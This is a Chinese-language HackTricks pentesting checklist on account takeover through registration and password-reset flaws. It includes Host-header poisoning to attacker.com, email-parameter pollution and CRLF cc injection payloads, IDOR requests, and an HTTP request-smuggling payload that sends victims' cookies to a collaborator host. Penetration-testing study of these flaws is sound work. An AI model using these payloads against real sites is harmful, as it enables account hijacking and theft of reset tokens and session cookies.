hacktricks/pentesting-web/registration-vulnerabilities.md

8.5 KiB
Raw Blame History

注册和接管漏洞

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS红队专家

支持HackTricks的其他方式

注册接管

重复注册

  • 尝试使用现有用户名生成
  • 检查变化的电子邮件:
    • 大写
    • +1@
    • 在电子邮件中添加一些点
    • 电子邮件名称中的特殊字符(%00%09%20
    • 在电子邮件后面放置黑色字符:test@test.com a
    • victim@gmail.com@attacker.com
    • victim@attacker.com@gmail.com

用户名枚举

检查是否可以确定应用程序中是否已经注册了用户名。

密码策略

创建用户时检查密码策略(检查是否可以使用弱密码)。
在这种情况下,您可以尝试暴力破解凭据。

SQL注入

查看此页面以了解如何尝试通过SQL注入在注册表单中接管账户或提取信息。

Oauth接管

{% content-ref url="oauth-to-account-takeover.md" %} oauth-to-account-takeover.md {% endcontent-ref %}

SAML漏洞

{% content-ref url="saml-attacks/" %} saml-attacks {% endcontent-ref %}

更改电子邮件

注册后尝试更改电子邮件,并检查此更改是否被正确验证或是否可以更改为任意电子邮件。

更多检查

  • 检查是否可以使用一次性电子邮件
  • 密码>200会导致DoS
  • 检查账户创建的速率限制
  • 使用username@burp_collab.net并分析回调

重置密码接管

通过引用者泄漏重置密码令牌

  1. 请求将密码重置到您的电子邮件地址
  2. 单击密码重置链接
  3. 不更改密码
  4. 单击任何第三方网站例如FacebookTwitter
  5. 拦截Burp Suite代理中的请求
  6. 检查引用者标头是否泄漏密码重置令牌。

重置密码篡改

  1. 在Burp Suite中拦截密码重置请求
  2. 在Burp Suite中添加或编辑以下标头Host: attacker.comX-Forwarded-Host: attacker.com
  3. 使用修改后的标头转发请求
    http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
  4. 查找基于_host header_的密码重置URL例如https://attacker.com/reset-password.php?token=TOKEN

通过电子邮件参数重置密码

# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

API参数上的IDOR

  1. 攻击者必须使用他们的帐户登录并转到更改密码功能。
  2. 启动Burp Suite并拦截请求。
  3. 将其发送到重复器选项卡并编辑参数用户ID/电子邮件
    powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

弱密码重置令牌

密码重置令牌应该是随机生成的,并且每次都是唯一的。
尝试确定令牌是否过期或是否始终相同,在某些情况下,生成算法可能较弱且可被猜测。以下变量可能被算法使用。

  • 时间戳
  • 用户ID
  • 用户电子邮件
  • 名字和姓氏
  • 出生日期
  • 加密学
  • 仅数字
  • 小令牌序列(字符在[A-Z,a-z,0-9]之间)
  • 令牌重用
  • 令牌过期日期

泄露密码重置令牌

  1. 使用API/UI触发特定电子邮件的密码重置请求例如test@mail.com
  2. 检查服务器响应并查找resetToken
  3. 然后在URL中使用令牌https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

通过用户名冲突进行密码重置

  1. 使用与受害者用户名相同的用户名在系统上注册,但在用户名之前和/或之后插入空格。例如:"admin "
  2. 使用您的恶意用户名请求密码重置。
  3. 使用发送到您的电子邮件的令牌重置受害者密码。
  4. 使用新密码连接到受害者帐户。

平台CTFd容易受到此攻击的影响。
参见:CVE-2020-7245

通过跨站脚本攻击实现账户接管

  1. 在应用程序内或子域中找到XSS漏洞如果cookie范围限定为父域*.domain.com
  2. 泄露当前的会话cookie
  3. 使用cookie对用户进行身份验证

通过HTTP请求走私实现账户接管

  1. 使用smuggler检测HTTP请求走私的类型CL、TE、CL.TE
    powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h\
  2. 构造一个请求,将POST / HTTP/1.1覆盖为以下数据:
    GET http://something.burpcollaborator.net HTTP/1.1 X:目的是将受害者重定向到burpcollab并窃取其cookie\
  3. 最终请求可能如下所示
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

通过CSRF实现账户接管

  1. 为CSRF创建一个有效载荷例如“自动提交密码更改的HTML表单”
  2. 发送有效载荷

通过JWT实现账户接管

JSON Web Token可能用于验证用户身份。

  • 编辑JWT以更改用户ID/电子邮件
  • 检查弱JWT签名

{% content-ref url="hacking-jwt-json-web-tokens.md" %} hacking-jwt-json-web-tokens.md {% endcontent-ref %}

参考资料

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS Red Team Expert

支持HackTricks的其他方式